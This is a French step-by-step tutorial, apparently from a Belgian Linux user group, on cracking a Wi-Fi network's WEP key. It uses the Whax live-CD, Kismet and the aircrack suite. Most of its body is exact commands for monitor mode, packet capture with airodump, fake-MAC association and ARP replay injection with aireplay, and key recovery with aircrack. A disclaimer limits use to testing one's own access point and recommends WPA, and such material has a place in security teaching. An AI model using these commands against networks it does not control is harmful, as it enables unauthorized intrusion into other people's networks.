Вы находитесь на странице: 1из 2

Vulnérabilité des réseaux Wifi: Comment cracker une clé WEP ?

Avertissement !
Ce document est seulement réalisé à un titre informatif. FSUGAr décline toute responsabilité vis-à-vis des
utilisations faites avec des techniques expliquées dans ce document.
Nous rappelons néanmoins que s’introduire sur un réseau de manière illégale (que ce soit un réseau protégé ou
non) est passible de lourdes amendes (voire même de peine de prison).
Dans ce document nous voulons juste montrer qu’il est très simple de s’introduire sur un réseau ”protégé” par
WEP et nous conseillons donc l’utilisation de cryptages plus sûrs comme le WPA.
N’utilisez ces techniques que pour tester la sécurité de VOTRE Access Point.

Quelle distribution utiliser ? et quels logiciels ?


N’importe quelle distribution pour autant que la carte wifi soit supportée (ne pas oublier de patcher pour
aireplay).
Nous utiliserons un live-cd pour simplifier les choses.

Les logiciels utilisés sont:

Le live-cd Whax 3.0 : http://iwhax.net/


Kismet : http://www.kismetwireless.net/
aircrack, airodump, aireplay : http://www.cr0.net:8040/code/network/aircrack/

Démarche à suivre : Il suffit de booter sur le live-cd, se logguer (le mot de passe root est ”toor”) et
ensuite choisir un environnement graphique : taper ”startx” pour KDE et ”flux” pour FluxBox.
Lancer la ”Konsole”.
Mettre la carte en mode monitor :
iwconfig eth0 mode monitor

Configurer kismet (spécifier la bonne valeur pour source) :

vi /etc/kismet.conf
et ensuite :
ifconfig eth0 up

Lancer kismet :
On peut voir les réseaux disponibles, on en choisit un et on note :
L’ESSID :1ère colonne
Le channel : 4ème colonne

et Q pour quitter.

On peut ensuite lancer airodump qui va capturer tous les packets (fsugar est le nom du fichier de sauveg-
arde et 6 le channel de l’AP dont on veut capturer les packets) :

airodump eth0 fsugar 6

Dans la première colonne on a le BSSID de l’AP.

On va maintenant enregistrer une fausse adresse MAC (0:1:2:3:4:5) dans la table ARP de l’AP :

aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 eth0

1
Ensuite on commence l’attaque :
aireplay -3 -b BSSID -h 0:1:2:3:4:5 eth0

Il suffit de patienter quelques minutes et normalement le nombre de IVs capturés par airodump devrait com-
mencer à augmenter rapidement.
Lorsqu’on estime avoir assez d’IVs (genre 200.000 pour une clé 64bits) on peut lancer aircrack même si airodump
continue de tourner :
aircrack fsugar.cap

L’option -n permet de spécifier le nb de bits par exemple -n 64 pour une clé 64 bits). Et si tout va bien la clé
WEP apparaı̂tra en quelques secondes, sinon il faut recommencer et capturer plus d’IVs :-)

Document réalisé par Gick [http://www.fsugar.be/].


Plus d’informations dans le très bon document de hakin9 :
http://www.hakin9.org/fr/attachments/format fr.pdf
également disponible à l’adresse http://www.fsugar.be/docu/wifi/hakin9-n2-wifi.pdf